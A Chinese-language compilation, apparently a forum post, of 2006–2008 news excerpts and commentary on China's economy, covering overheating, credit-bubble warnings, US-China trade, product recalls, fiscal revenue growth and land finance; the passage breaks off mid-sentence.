“中国威胁论”？另外，中国经济是否过热？如何把热度真正地降下来？降不下来有多大的危险？这些问题全世界和中国国内讨论得已经很多了。经济超高速发展带来的问题包括：基础设施难以跟上，导致缺电、缺水等问题；盲目开发基础设施，导致环境和自然等问题经常被忽视；在股市、房市等大量气泡的情况下，人们不得不始终担心哪一天会有个 “硬着陆”。中国的目标是把发展速度控制在 8％左右，但采取了不少措施，却总是降不下来。还有什么办法吗？这是一个需要广泛深入研究的问题。中国统计局认为，通胀主要是由食品价格引起的。而中国日前说要进口大量肉类，这是一个非常值得注意的动向。世界工业国家的发展过程中，食品价格的上涨是转制成为工业国家的一个重要信号，即从农业国转向工业国。显然，中国也无法避免这种转制，也许会有越来越多的农产品今后需要进口。经济高速发展中，势必有许多新的问题不断产生，也就是说，许多典型资本主义初级阶段的问题，比如前一阵震撼世界的黑窑问题，陈良宇、郑筱萸的腐败问题。怎么有效地控制这些问题，既保证经济高速发展，又保证社会稳定呢这方面牵涉到的已经超出了经济范畴。……………………靠贷款吹大的中国危机经济据意大利《亚洲新闻》报道，中国经济是依靠银行向公司企业贷款 “吹起来的”。而现在，后者根本无力偿还贷款。为此，中国面临着 1930 年代美国的经济大萧条的危险，并将在世界范围内造成影响。世界央行的央行 “国际清算银行” 发出了上述警告；指出中国可能遭遇 1930 年代的美国大萧条、1980 年代的日本危机、1990 年代的东南亚经济危机等。指出，“上述倒退都是从没有通货膨胀的经济迅速增长开始的。许多分析家已经宣布将会爆发新时代的危机”。现在，如同当年一样，存在种种危险的迹象，出现了大批的新型贷款模式、内部债务不断增长、投资者偏爱风险投资、世界货币兑换明显失衡等。而市场失衡，直接打击了世界经济。最终，可能产生远远超过预想的后果。“国际清算银行” 在相关报告中继续指出，中国经济正在重复日本在 1980 年代的错误。 1930 年的美国和 1991 年的日本，都出现了企业过度贷款、投资迅速增加，导致 “泡沫式” 经济体系的现象。今天，40% 的中国国有企业都在亏损、全靠银行贷款存活。这种现象潜在的最大危险是，银行无法追回贷款，为了避免破产，货币就要贬值大批流通。长期以来，低利率的贷款政策产生了危害性极大的恶果。因为，利用贷款将信贷者的财富转帐给了借贷人。最后，报告中指出，中国的增长是 “不稳定的、失衡的；没有得到协调、无法支持的”。目前，北京试图降低流动资金。但是，由于继续在为企业贷款，所以反复提高银行利率等措施并没有产生重要的效果。多年来，中国的经济增长幅度始终维持在每年 10%。但是，这一增长率是奠定在不可能保持这一增长幅度的领域内的。首先是，廉价劳动力，低工资、甚至经常欠薪和缺乏劳动安全保障等。此外，以环境为代价的野蛮发展。中国可能爆发的危机，将在世界范围内造成影响。这主要还是因为 “改革的” 资本、市场自由化、全球化等，带来了历史上前所未有的货币泡沫。……………………中美已被经济捆绑在一起美国《商业周刊》最新一期载文《中美已被经济捆绑在一起》，摘要如下：由食品安全之争而有可能引发美中贸易大战，令全球关注。美国专家撰文指出，贸易大战会让两国皆输，唯有合作才会有更多收益，因为两国关系和未来已被经济紧紧捆绑在一起，两国只有合作才会双赢，否则就会双输。在美国与中国爆发一场贸易大战之前，美国的政策制定者和政治领袖们应该不要紧盯着眼前的贸易赤字，而是要考虑这个复杂而且性质正在转变的美中经济关系。美国政府公布的统计数据称，2006 年美国与中国的贸易逆差高达 2325 亿美元。这的确代表着一种真实的经济不平衡，它也制造出一套复杂的挑战，而且还没有简单的解决方案。虽然对经济学家和政治家们来说，寻找外部原因是很自然的，但事实则是，无论是中国企业还是中国政府，都不应该为这种贸易不平衡负主要责任。中国的绝大多数的出口，都是由外国公司驱动的，而中国国内的许多市场相对来说也是对外国产品和品牌开放的。因此，贸易赤字只反映出复杂的全球化的现实。美国消费者每天在沃尔玛 (Wal-Mart)、好市多 (Costco)、电路城 (Circuit City)、梅西 (Macy) 等其它大型零售连锁商所购买的那些商品，都标出由西方人设计并符合西方质量标准的品牌，但这些商品却是在中国生产的。其实，为了保持货源源源不断地流入，美国和其它国际公司为了进一步扩大他们在中国的业务，每周都在向中国投资 10 亿美元。相比之下，中国还没有产生出一个规模庞大的纯粹属于自己的出口基地。它与日本和韩国有着极大的差异，这两个亚洲国家的本土公司，在出口方面占有绝对的主导地位。但在中国，出口游戏却完全被外国公司主导着。那么，中国自己的市场又是什么样子呢？中国从国外进口许多外国货么？虽然中国没有进口足够的美国货来缓解两国的贸易不平衡，但与早前相比，中国正在从美国购买很多商品，而且在其经济继续蓬勃发展之际，中国可能会在未来进口大批的美国货。事实上，中国消费者喜欢外国品牌。而随着收入的不断增加，更多的中国消费者将寻求外国制造的商品。美国和其他非中国国内品牌已经支配着许多行业，包括家用小车、移动电话、电脑打印机和高端电视机。这也应该是对我们美国人的提示：让中国市场继续保持这个势头。目前，中国的服务领域如金融服务、通信、媒体和娱乐等，还没有完全对外国公司开放。这也是美国的贸易谈判专家应该从法律上给予关注的领域，因为一个开放的中国市场将会让美国的经济获益。另一个有前途的行业就是旅游业。中国消费者渴望到美国旅游，到美国去花钱。为此，美国的政策应该逐步改善，更好地抓住这个时机。……………………美国鬼子也对中国经济给予了评价。华盛顿邮报：中国综合症            2007-07-18 10:53:40 　　来自: 椰子啊椰子      吃人的肉 (锦州)      中国综合症            2007 年 07 月 17 日 11:49 大      中      小      Jeremy Haft在牙膏、玩具、轮胎等一系列中国 “杀手” 的背后，有没有什么可以聊以自慰的地方呢？说起来很难相信，但坏事确实也有好的一面。蜂拥而至的产品召回事件不仅表明中国并不是让我们心生畏惧的制造强国，也让我们看到了美国的优势，一种容易被忽略的优势。诚然，贪婪是促使很多中国供应商生产次品、甚至有害产品的原因，但自身能力有限往往也是原因之一。如果你去一家普通的中国工厂看看，就会知道为什么了。资本、技术、知识，什么都缺。在工人们看来，顺从听话要比生产质量重要。一件产品从制造到出厂，没有多方经手是完不成的。假如我们生产一件产品需要 3 道工序，那么平均来说中国就需要 17 道。与 80 年代的日本不同，中国经济增长靠的不是大公司，而是小企业。中国工业领域有成千上万家工厂和农场，还不算众多贸易商、掮客、运输商以及代理。所有这些人都对商品和原材料有着或多或少的影响，但他们的行为却都无法大幅提高产品附加值。相反，生产链每多出一个环节，成本、风险和时间也都随之增加。这种情况下对产品进行有效的质量管理是有相当难度的。成本控制同样不易。虽然拥有廉价的劳动力资源，但在中国造东西往往要比在美国昂贵得多。对生意人来说，中国绝非一部没有取款限额的廉价品自动提款机，而是一处耗时又耗资的风险之地。然而民意调查显示，大部分美国人都认为中国已控制了基础制造业，如今正迅速侵入他们的后院──高端领域。这种看法是错误的。一连串产品召回事件表明，中国生产的低端产品尚且无法令人信赖，更何况他们研制的高端产品就更无法满足人们的要求了。再说，这已经不是几个坏苹果的偶发事件了，是结构性问题。要想在和美国经济迎面交锋的过程中抢得先机，中国必须对其工业结构进行革命性地调整。它必须去除繁琐而不必要的中间环节，将小厂整合到竞争力更强的大型企业中；人才培养方面，它必须训练工人掌握现代科技和商业实战知识；还要强调透明式管理和依法统一管理。此外，仅仅短期内实行这些举措还不够，应该长期贯彻。与此同时，中国人希望两年后美国能从中国进口轿车。要想产品达到国际标准，仅有现代化的产品线是不够的。厂家、供应商以及客户的企业文化都要以减少错误、精益求精为主要目标。看看一辆中国产汽车，从中发现的一项项真凭实据不仅会让你明白为何中国汽车商不得不一再推迟登陆美国的计划，还会让你了解中国要造出一辆美国人愿意掏钱购买的车到底还有多远的路要走。相比之下，美国经济却能高效生产出种类繁多的商品和服务。在很多领域，我们要比中国领先数十年，而说到服务业、高科技制造业等这些已在美国遍地开花的行业，中国眼下甚至都还处于缺失的状态。正当中国百姓以前所未有地阔绰方式出手消费时，美国的这种竞争优势也得到了体现。目前中国中产阶级的人数已经超过了英法两国的人口总和，而且还在以惊人的速度发展。就世界范围来说，中产阶级人数的上一次快速增长还要追溯到美欧日的工业崛起之时。洋房、教育、医疗，高科技和基础设施，这些都是中国消费者想要的，然而本国资源却无法满足这种需求，因此中国便从海外进口了大量它所需要的高端产品、材料和服务。如此一来，中国购买的美国商品变得越来越多，目前美国对华出口的增长速度已经相当于其对其它地区出口增速的六倍。几乎美国所有的经济领域都正经历着中国市场前所未有的旺盛需求。就在多数美国人担心廉价中国商品将如潮水般涌来时，其实这些商品中的大部分都是出自美国的原材料和零配件。货架上的服装是美国棉花织的；家用器皿是美国钢铁造的；就连电脑都用的是美国技术。因此中国对美出口大幅增加，美国对华出口也随之飙升。中国的采购对象不仅有美国大企业，还包括小企业。对后者来说，中国已成为其增速最快的出口市场。有人说 “21 世纪是中国的世纪”，对此我们也应该看清事实真相。中国的崛起不会令美国陨落。美国企业应该拿中国的发展为我所用，同时发挥自身优势，这样一来，他们就迎来了百年一遇的大好机会，一个既能发财致富、又能创造国内就业岗位的上佳机遇。抛开短期利益，新世纪中不是哪个国家能造出最便宜的火花塞谁就能成为主导，真正的主导者应该是创新者和企业家，而这正是美国所具有的资产，无人与之媲美。创新──而非效仿──不仅能创造就业机会，还能帮助美国经济在新世纪中继续一马当先。随着我们开始对中国进口品实行深入细致地审查，未来的产品召回范围无疑还将扩大。记住，这些召回事件不仅让我们了解中国，也让我们了解美国。坏事中好的一面是什么？就是让我们看到了自己内在的优势。（编者按：Jeremy Haft 是 “All the Tea in China: How to Buy, Sell, and Make Money on the Mainland” 一书的作者，同时还是 BChinaB Inc. 的创始人。）……………………中国经济发展阻止了政治民主化2007 年 12 月 10 日 星期一 节目长度：1 分 18 秒 下载 mp3美国著名的中国问题专家认为，中共把财富与权力结合起来的策略加强了其执政的合法性，同时也阻止了经济发展促进政治民主化的转变。12 月 9 日，美国之音引述乔治. 华盛顿大学爱略特国际关系学院的政治学和国际关系教授狄忠蒲 (Bruce Dickson) 的话说，中共把财富与权力结合起来的做法，产生三个结果。首先，中共积极吸收私营企业家入党，造成私营企业家对共产党的政策目标的支援，使政治精英和经济精英联合，维护中共执政权力。狄忠蒲教授说，随着中国经济的发展以及实力的增强，中国的民族主义情绪也日益上升。而这种随着中国国际地位的提高而来的民族自豪感成为中共用以维持其执政合法性的第二个基础。狄忠蒲教授还指出，第三个基础就是因为经济实力的雄厚，它宣称有能力维持社会秩序与稳定。这样一来，阻止了经济发展促进政治民主化的转变。而且，中共把财富和权力结合起来的策略所带来的一个后果就是日益加剧的贫富差距和腐败，导致老百姓对政治和经济精英的憎恨，从而引发民众的抗议。……………………崔之元发来的内容。世界银行：中国新股在严重贱卖 国家少收近百亿元信源：新闻晨报｜编辑：2007-05-31世界银行昨天发布的最新《中国经济季报》指出，越来越多的迹象显示，国际流动资本对中国的利率并不敏感。而新股发行定价严重偏低则导致国家损失近百亿元。世界银行援引 Dealogic（一个投资者信息服务机构）的资料称，今年头两个月，新股的 “上市当日价格” 平均比发行价格高 70%。中信银行上市首日的价格几乎翻了一翻，中国人寿的价格更是翻了一倍多。世界银行表示，新股发行定价严重偏低意味着国家的损失。如果今年所有新股的发行价格和上市当日价格一样的话，国家将增加 95 亿元人民币的收入，这比中央财政今年用于免除农村义务教育学杂费的总支出还多。配售到原始股的投资者是较低发行价的受益者，但大多数原始股都被机构投资者和其他大的投资者持有。此外，上市公司的管理层也会从中获益。很多上市公司管理层的薪酬与股价的涨幅相关联，因此他们可以从低价发行带来的上涨潜力中获益。例如，分别在香港和上海上市的中国银行，对于高管有一个 “股票增值权计划”，高管可以获得与股票上市后股价上涨金额等同的收入。……………………人们更是注意到中国经济的奇怪之处。香港《大公报》社评中国经济的四大怪现象 2006-08-28 11:47:15 楼主尽管中国大学生就业难已经成为人所共知的问题，但联合国开发计划署在一份研究报告中提出 “中国面临无就业增长挑战” 的提法还是让人颇感意外。不过，关于中国经济高增长与高失业并存的现象并不是联合国第一个发现的，早在几年前，国内经济学界就曾有过高增长与高失业是否相悖的争论，显然高增长与高失业并存早已被国内认可。传统经济学理论认为经济高增长必然带来高就业，因此，中国的高增长与高失业并存是不是一个特例呢？我们比较了与中国同时被列为 “金砖四国” 的另外三个国家的经济增长与就业情况。结果更加出人意料，在 “金砖四国” 中，只有中国出现了违反经济学常理的现象，其他三个国家经济高增长都带来了就业机会的高增长。所谓 “BRIC” 是指巴西、俄罗斯、印度、中国四个经济正走向现代化的国家。这四个国家中，两个是资源大国，两个是人口大国，这四个国家经济的起飞已经使全球的商品市场出现了延续近三年的牛市，也是全球经济的增长出现近十年来最好形势的重要原因。这次比较我们还发现了中国经济存在的另外三个有反经济学常理的现象：长期经济增长与股票市场走势背离，低通货膨胀与高房价象背离以及经济过热与超低利率并存。我们暂不考究上述背离现象后的原因，只是姑且把它们与高增长高失业率并存的现象笼统地称为中国经济四个怪现象。怪现象一：高增长与高失业率并存中国就业机会增长速度低于经济增长速度并非什么秘密，仅看一下每年大学生就业市场就能一目了然。国家统计局曾经有一个测算，20 世纪 80 年代， GDP 每增长 1 个百分点，可增加 240 万个就业岗位；20 世纪 90 年代以来，只能增加 70 万个。问题的关键在于，普通高校毕业生人数在大比例上升， 2001 年为 115 万，2002 年为 145 万，2003 年为 212 万，2004 年为 280 万，2005 年将为 338 万。通过这组数据，凸现在我们面前的是，自 2000 年以来，经济发展得越快，大学生就业的难度似乎反而越高。联合国开发计划署 6 月 29 日发表报告称，“贸易使不平等的状况进一步恶化。在东亚的成功故事背后，隐藏着‘无就业增长’的挑战，年青人与女性正经历着‘无就业增长’，劳动人口的增加远远快于工作机会的增加。” 这份名为《2006 亚洲太平洋地区人类发展报告》的报告中说，在上个世纪 90 年代，由于出口的持续上扬，中国的经济增长一直处于一个非常高的增速之中，高达 10.1%；而同期，就业的增长率却只有 1.1%。怪现象之二：经济增长没有带动股市上扬股票市场历来被称为宏观经济的晴雨表，另人奇怪的是，这个晴雨表在中国却常常失灵。尽管中国股票市场自去年 12 月份以来出现了一波规模可观的上涨，当相比于沪深股市在过去 4 年里的下跌幅度来说，这次上涨充其量也只能算是一次技术性反弹。而与金砖四国的另外三个国家相比，中国股市在过去 5 年的表现实在是乏善可陈。在过去四年中，金砖四国中除中国股市外，其他三国股市的表现都非常优异。去年俄罗斯股市上涨超过 100%，巴西和印度股市上涨超过 50%；今年，巴西和俄罗斯股市上涨又已超过 10%，印度股市也上升约 8%，只有中国股市由于受经济减速预期和全流通的影响而表现一般。尤为值得一提的是，印度股市在过去 3 年里增长了三倍多。尽管前一段时间出现了下跌，但印度股市目前仍维持在 3 年来个高位。2003 年 6 月份，孟买 SENSEX 指数基本尚处在 3000 点的位置，2006 年 2 月 17 日该指数突破 10000 点大关，上涨幅度不可谓不惊人。同样是发展中的人口大国，为什么印度股市能大涨而中国却不能呢？怪现象之三：高增长与低通胀并存一般来说，经济高速增长伴随收入增长总是会出现或轻或重的通货膨胀，这是一个寻常现象也是情理之中的事情。但中国经济持续多年高速增长却没有出现严重的通货膨胀，与此相反的是，中国在前两年甚至出现了通货紧缩。在经济高速增长的同时出现通过紧缩也是传统经济学理论无法解释的一个现象。相比中国而言，金砖四国的另外三个国家在经济高速增长的同时都出现了程度不等的通货膨胀率上涨。在金砖四国中印度 6 月份通货膨胀率为 5.24%，俄罗斯为 6.2%，巴西为 8%，都远远超过中国。通货膨胀率温和上涨是经济繁荣的一个征象，并不意味着经济运行出了问题。奇怪的是，中国经济持续多年高增长不仅没有引起通货膨胀反而出现了通货紧缩。这也是中国经济的一大怪。需要指出的是，中国的低通货膨胀是在房地产价格飙升的情况下出现的，这其中是不是也有联系呢？怪现象之四：经济长期过热和超低利率并存这也是一个也非常值得关注的现象。中国经济过热早已见于媒体报道和官员的讲话中，而且中国目前的实际利率仍然接近为零。一般来说，超低利率政策一般在经济增长乏力时实施，例如泡沫破灭后的日本。一般在出现经济过或热通货膨胀抬头时应该结束低利率政策以保证经济健康运行，例如美联储加息。中国在经济出现明显过热的情况下坚持超低利率政策本身就是一个悖论。以上只是简单地列举了中国经济几个与众不同的现象，由于传统经济学理论对此并不能给予另人信服的解释，所以我们暂且称之为中国经济怪现象。……………………国内的《每日经济新闻》则是对中国经济决策领域里的千奇百怪进行了警告：严防境外利益集团介入中国经济决策。要想防止境外利益集团势力的进一步扩张和对中国经济的干预，严防这些利益集团的 “经济颜色革命”，就必须对这些境外利益集团的 “买办” 和 “买办” 行为进行全面检查，如果发现他们有以权谋私、损害国家和人民利益的行为，一律从严查处，决不手软。詹奕嘉发来了号称上海第一支笔的叶檀的文字。詹奕嘉2008 年 1 月 15 日 15:15近期网文共享财政收入节节攀升：高增长中的创伤记忆–叶檀 ZZ2007-12-30 中国经营报分配体制改革越来越严重地扭曲了中国经济市场经济的改革进程，甚至发展到市场化改革本身遭遇质疑的地步。一个问题横亘在所有人的心头挥之不去，我们的经济发展究竟为了什么？2007 年中央政府财政收入再创新高，从国家统计局总经济师姚景源到财政部副部长王军，都透露出一个信息，中央政府 2007 年全年财政收入将超过 5 万亿元人民币。消息传出，引来的是无数质疑。人们从各个角度 —— 比如公共财政与 GDP 的比重，企业与居民的税负情况，公共财政的使用情况 —— 质疑 5 万元的政府财政收入过于庞大，有与民争利之嫌。凡是牵涉到与分配体制甚至与财富增长有关的报道，诸如城乡收入差距、行业间职工收入差距、资本市场最牛散户与普通投资者、政府财政收入增长与基础教育公共医疗投资等，都能激起最强烈的情绪反映，成为新闻点击率的常胜将军。甚至连明显经不起推敲的情绪性新闻都能引来一片喝采之声，这说明，收入分配体制已经成为整个社会的集体创伤记忆，而 5 万亿的财政收入数字，挑动了人们的敏感神经。在质疑官方数据成风的情况下，没有一个人质疑这一数据的真实性，也许政府的财政收入是惟一不受真实性拷问的数据。对于分配体制的不满并不仅仅局限于政府与民间这个传统层面，而是渗透到一切领域：国有大型企业与民营企业之间互相不满，国有大型企业的管理层与普通员工之间存在不满，中央政府与地方政府对于分税制下的财政分配模式认识不尽相同，政府与纳税人之间存在剧烈的冲突。就财政分配模式而言，存在以下政府与个人、中央政府与地方政府、企业与个人之间三个向度的扭曲。这种扭曲导致了非常严重的后果：一，政府规模与政府开支一起攀比增长，现在核定基数每年递增一定比例的拨款方式，无疑怂恿了政府规模的无限扩大，政府规模的扩大必然导致管制力量的增加，因此，历届精兵减政效果不彰，甚至出现逆效果；二，由于分税制的后遗症和消费税制迟迟无法推行，地方政府财力不济，财权事权不匹配，导致各种税收之费以及土地财政恶性膨胀，终至演变成今日几乎不可收拾又不得不收拾的局面；三，政府财政收入与居民财政收入的增长畸轻畸重，导致居民消费能力弱化，内需经济上下呼吁多年却迟迟无法启动，导致经济结构严重失衡，安全系数降低。庞大的政府与管制经济的体制复归路中央财政收入的突飞猛进是这两三年中国经济发展过程中无法忽视的现象。根据社科院的预计，2007 年中国 GDP 增长 11.6%，全年 CPI 维持在 4.5% 的高位，今年财政收入增加 1.2 万亿达到 5 万亿元，几乎已成定局。财政收入的增长可以从下列数据中得到佐证。2003 年我国财政收入突破 2 万亿元，2004 年突破 2.5 万亿元，2005 年突破 3 万亿元，2006 年接近 4 万亿元，今年的财政增长将达到 5 万亿。这样金璧辉煌的数据令其他国家黯然失色，中国政府可以说是世界上最富有的政府之一，也是负债率最低的政府。相比政府财政收入而言，从 2003 年开始，我国 GDP 增长速度分别为 9.1%、10.1%、9.9%、10.7%，2007 年预计 GDP 增长 11.5% 左右。财政收入占 GDP 的比重大幅度增加到令人匪夷所思的地步，以及财政支出占 GDP 的比重同等增加，说明政府的规模、对资源的配置能力，对社会、经济的干预程度得到了极大的增强，目前我国出现了全面指令型的体制复归的极大风险，从另一个重要的反映政府财政活动能力的财政支出占 GDP 的比重也可以见出端倪。据中国社科院财贸研究所副所长高培勇先生的研究，我国的财政支出占 GDP 比重在三十年间经历了一次 V 字型大反转。从 1978 年的 31．0％一路下滑到 1994 年的 12.0%，中央财政收入下降导致掌控能力下降，这才有了 1994 年的分权让利。以 1994 年财税重大改革为起点，财政支出及其占ＧＤＰ的比重大幅攀升，从 12.0% 上升至 2006 年的 19.73%，年均增长 19.94%，形成了一个明显的 V 字型结构。与此结构相伴随的是改革之初 “减税让利”、“分权让利” 的一系列市场化改革举措，小政府与大市场初见雏形，而 1994 年之后，大政府大国企的体制复归再次显现，政府对资源配置越来越强势，突出表现在国企所占利润比重越来越大，以资本市场而论，规模最大的前 20 家上市公司全部是国企，今年央企利润突破一万亿，预计今后将以每年增加一个中石油的速度向上攀升，有关部门如此形容他们的政绩。在新中国历史上，政府支出占ＧＤＰ比重数字的最高水平发生在 1960 年，为 39.3％，当前政府部门占用并处置的ＧＤＰ份额，加上预算外的政府支出，事实上已经与 1960 年的高点持平。这些政府支出并没有全部用于公共设施上，2005 年，公车消费、公款吃喝、公款旅游三项相加高达 6000 亿元，占国家财政收入的 20%，相当于全民义务教育投入的 5 倍，我国今年教育投资超过 3% 已经是个不小的成绩。政府占用的资源过多，直接表现在政府规模的庞大与成本的上升，以及政府对经济的过细管制与不当管制上。全国政协委员、国务院参事任玉岭曾经指出， “我们的官民比已达到 1∶26，比西汉时高出了 306 倍，比清末高出了 35 倍，史无前例。而从改革开放初期的 1978 年至 2003 年的 25 年间，我国行政管理费用已增长 87 倍，而且近年来平均每年增长 23％！行政管理费占财政总支出的比重，2003 年已上升到 19.03％，比日本的 2.38％、英国的 4.19％、韩国的 5.06％、法国的 6.5％、加拿大的 7.1％、美国的 9.9％分别高出 16.65、14.84、13.97、12.53、11.93 和 9.13 个百分点。国家审计署中国国库最佳看门狗李金华先生曾说，“政府成本高，再廉洁也是浪费纳税人的钱”，更何况还难谈廉洁二字。政府规模庞大必然导致管制增加，虽然据国务院行政审批制度改革工作领导小组办公室负责人公布，今年上半年国务院部门共取消和调整行政审批项目 1806 项，占总数的 50.1%，但通常的情况下，取消了旧审批增加了新审批，或者是取消了无关痛痒的审批项目，或者因新部门而设新项目，层层叠叠，造成企业经营环境、创业环境等并未有实质性改善。如民企在资源行业的准入门槛虽然表面上通过非公三十六条等被降低，实际上通过商务部等部门的一些具体规定，不低反高。一味追求大政府与大管制的目标取向无疑是非常危险的，更大的危险在于政府对于财政收入的比重津津乐道，致力于解释并继续提高这一比重。大管制的复归，恐怕会使计划经济有死灰复燃的机会，这是中国市场化过程中最大的风险。中央财政与地方财政断裂助燃土地财政与税外之费目前地方的土地财政遭到各界一致痛斥，并被认为是目前房地产畸形发展的罪魁。事实上，土地财政是后税制的后果之一。在分税制前，是中央财政财力较弱，实行分税制后，地方政府首先面临的就是财权事权不对等的困境。在实施财政包干体制后的 1985 年至分税制前的 1993 年，中央财政收入占全国财政总收入比例平均为 31.8%，财政支出占全国财政总支出比例平均却为 33.9%，收支平衡比例基本平衡，但中央政府依然偏弱，并且财政包干博弈的主动权在地方政府手中，到 1993 年，中央财政收入比重不断下降，到 1993 年，中央的财政收入占全国财政总收入的比重又下降到 22%。分税制就是旨在通过税收收益的重新划分彻底根治这一问题，以增加中央政府的宏观调控能力。分税制效果立竿见影，1994 年当年，中央的财政收入占总收入达到 55.7%，比 1978 年增加 40 个百分点，中央财政支出并未增加，只占财政总支出的 30.3%。此后的 1995 年到 2004 年，中央财政收入平均占国家财政总收入的 52%，财政支出平均只占国家财政总支出的 29.8%；同期地方的财政收入占国家财政总收入平均为 48%，但财政支出却占国家财政总支出平均为 70.2%。此时正值中国体制转轨的关键时期，大量国企工人下岗，产业升级换代，亏损的国企与地方银行的管辖权交给了地方政府，而教育等经费了由中央和地方共同承担，地方占了大头。在这样的情况下，土地财政应运而生，从 1996 年由深圳与上海发韧的土地储备制度与交易制度很快蔓延到全国，2001 年全国土地储备中心的成立宣告了这一模式受到中央认可，此后土地的招拍挂制度的出笼等，奠定了土地作为由政府垄断的稀缺投资品的特殊地位，这也缓解了地方财政的巨大压力，到目前为止，土地财政已经牢牢奠定了地方财政的支柱地位。由此形成的路径依赖并不会因为土地推出偶有增量而改变，土地财政深刻了改变了地方政府的行为模式，消费者的消费支出权重，以及税收制度的变化，可以说，其显现出的负面效应成为中国今日最大的经济陷阱。在负面的激励机制没有根本性改变之前，中国的土地与房地产市场依然会成为资金最大的吸血管道。不仅如此，为了应对财政压力，承载越来越庞大的行政机器，税外之费的数量也在急速上升。这些收费大多列为行政开支，一些是政府允许的行政收费，如设立机构财政不拨款而允许自筹资金，城管、卫生防疫、食品和药品监督等机构都属于自筹资金范畴，给予这些机构行政执法权，实际上是从激励机制上打开了乱收费乱罚款的闸门。甚至农村修公路，交通部只给 70％的钱，另外 30％靠自筹。从 2006 年地方政府实际收入结构看，全国没有纳入预算管理的 27000 亿元资金 90% 在地方，地方收入占国家实际总财政收入的 63%，其财政支出达到 42000 亿元之巨，各地附生于房地产行业的收费就不胜枚举，房地产的地位因此更加牢固。这些费用怎么使用？据周天勇先生估算，在使用过程中浪费型的行政开支占据了很大一部分，公车、公招和公出每年消费掉９０００亿元左右；豪华办公楼、行政中心、培训中心的建设、维护和运行每年消耗也在１万亿元左右；一些运动式、政绩式和形式主义的工程、节日、庆贺、大会等活动，也消耗大量的财政资源。土地财政与预算外收费是中国经济两大病兆，如果不动大手术翦除，中国的市场经济规则与公共财政体制难以确立，财政分配体制的改善是当务之急。过于富裕的政府无法发展内需经济中国经济遭遇到的压力已经使得内需经济的发展迫在眉睫，但是，这一提出了五、六年的动议如今依然只是一个政策建议，其中的一个重要原因就在于政府财富过多，房地产等公共资源沦为吸食民众财富的绞肉机。笼统地说中国居民存款过多是有意混淆视听，事实上，在金融机构的储蓄中，政府和企业总储蓄占国民总储蓄比例高达 70%。根据国民账户资料计算， 10 年来，中国的国内总储蓄占 GDP 的水平不断提高，提高幅度约为 10%，但居民家庭储蓄占 GDP 的比重不断下降，下降幅度为 4% 左右；政府储蓄所占比重略有增长，但不显著；企业部门的总储蓄增长最为突出，占 GDP 比重增长了约 8%。统计表明，政府与大型国企的储蓄才是中国储蓄的大头，认为储蓄下降就能增加居民消费，或者存款活期化就能让一般民众分享中国资本市场红利的说法天真之极，实际上，真正能够拉动消费的只有政府与企业的大额定单，但他们不会这么做，而是会走高储蓄高投资之路，这也是我国的固定投资维持在 25% 以上、经济过热的根本原因。这也与居民实际可支配收入与最终消费率下降的数据相吻合。据历年《统计年鉴》中资金流量表（实物交易）相关数据揭示，经达二次分配后，1992 年至 2002 年，我国住户部门可支配收入所占 GDP 比重下降显著，10 年下降超过 4%；居民最终消费率同时出现大幅下降，从 1999 年的 47.6% 水平急剧下降到了 2005 年的 38.2%，下降高达 9.4 个 %，年均超过 1.3%；居民最终实际可支配收入占 GDP 比重从 1999 年的 63.34% 下降到 2005 年的 49.55%，7 年下降 13.79%，年均下降 2% 左右。居民消费绝对值在增加，相对值却在减少。而 2007 的数据与 GDP、通胀率比仍然不容乐观。政府正在试图依靠建立覆盖全民的社保体制、降低房地产增幅等手段拉动内需，这种手段见效虽慢却能治本，但问题在于，另一方面政府财政收入的急剧上涨又在抵销完善社保的努力，并且，社保的投入资金远远比不上财政收入的增长速度，让人无法相信这是内需经济建立的前兆。并且，由于税费繁重以及管制过严，对中小企业在融资等领域的歧视性政策，导致中小企业脆弱，与之伴生的就业数据不良。根据全国工商联的数据，我国现在有 800 万个企业，每 1000 人中只有 2．6 个企业。而在日本，每 1000 人中有 50 个企业，降低了失业率，增加了中等收入阶层。我国中小企业大量破产导致就业率不充分，1990 年，每百名城镇人口从业率是 56．44％，2006 年降低到 48％，下降了 8 个百分点。与此同时，小企业在加速破产，个体从业者在减少，由于经济转型压缩顺差之需，出口退税与汇率政策改变，2007 年年底，东南沿海的中小制造企业出现大批量破产，一个区域内破产企业达数千家。另一个事实也在提醒我们，在居民存款中，20% 的人掌握了 80% 的存款，导致大部分人无力消费。政府、企业尤其是大型企业、最高收入阶层是收入分配中的强势阶层，但他们无法让中国成为一个内需经济为主的消费型社会。内需经济之所以无法拉动，并不是因为民众不愿消费，也不是消费文化不发达，而是大部分人无钱消费。10% 以上的人均可支配收入增长，掩盖不了如下事实：启动消费需要大量中产阶层，而中国中产阶层正在沦为房奴、教育费用的奴隶，启动消费需要充分的就业与真实收入的增长，而通胀的压力与数年难涨的薪酬让许多人不敢也不愿消费。正是在上述意义上，财政收入大增带来的心理刺激已经超过了这一事实本身，而成为一种放大的体制现象，一种大投资大管制经济模式的投影。政府希望改变目前的经济发展模式，建立大市场、拉动内需，首先要改变目前为财政收入的增长而欢欣鼓舞的心态，严格控制财政收入脱离 GDP 发展速度的异常增长，形成藏富于民的理念，同时形成藏富于民的机制。希望 2008 年，财政收入能够与 GDP、与居民财富的增长速度更加和谐。作者注：为中国经营报所写年终稿，有删节，此为原文。http://yetanyetan.blog.sohu.com/75559954.html……………………中国右派们则不失时机地对中国经济建言献策。宏观经济，面临考验廉邦治2008 年中国的宏观经济走到了一个重要的十字路口。原来的经济增长模式正面临巨大挑战，驱动经济发展的三驾马车似乎都走向动力衰竭，因为流动性过剩引发的通货膨胀阴影又对经济体构成巨大的威胁。如果无法展开深层次的制度变革，释放更多的经济活力，那么中国经济体将滑入一个痛苦的滞胀泥潭。先看投资。长期以来政府主导型的投资是中国经济增长的重要动力。但是这种投资模式效率低下，导致资源错配，经济冷热无常，本质上是无法长期持续的。2008 年当局采取从紧货币政策来试图为经济降温，虽然政策效果尚待观察，但是投资对经济增长的贡献权重下降则是无疑的。房地产市场可能是重要的风向标。一刀切的从紧政策对中小企业，尤其是民营中小企业的伤害将出现很多让人无法意料的后果。再看出口，由于各种要素价格的上升，包括劳动力成本的上升，出口退税的降低，人民币不断升值，再加上次贷危机引发的国际消费市场萎缩，尤其是美国市场的萎缩，都导致了 2008 年出口不会再 “风景这边独好”。 08 年已有的出口统计数据已经佐证了这点。当然实际问题可能会更加糟糕。因为统计数据本身并不可靠，它无法有效甄别国际热钱通过一般贸易渠道渗入经济体的数据，出口增长下降也许早已经发生，只不过没有反应在统计数据上面而已，问一问出口行业从业者，他们的悲观感受远为真实。至于消费，虽然这些年来一直保持着温和增幅，但是由于深层次的体制因素，没有理由认为 2008 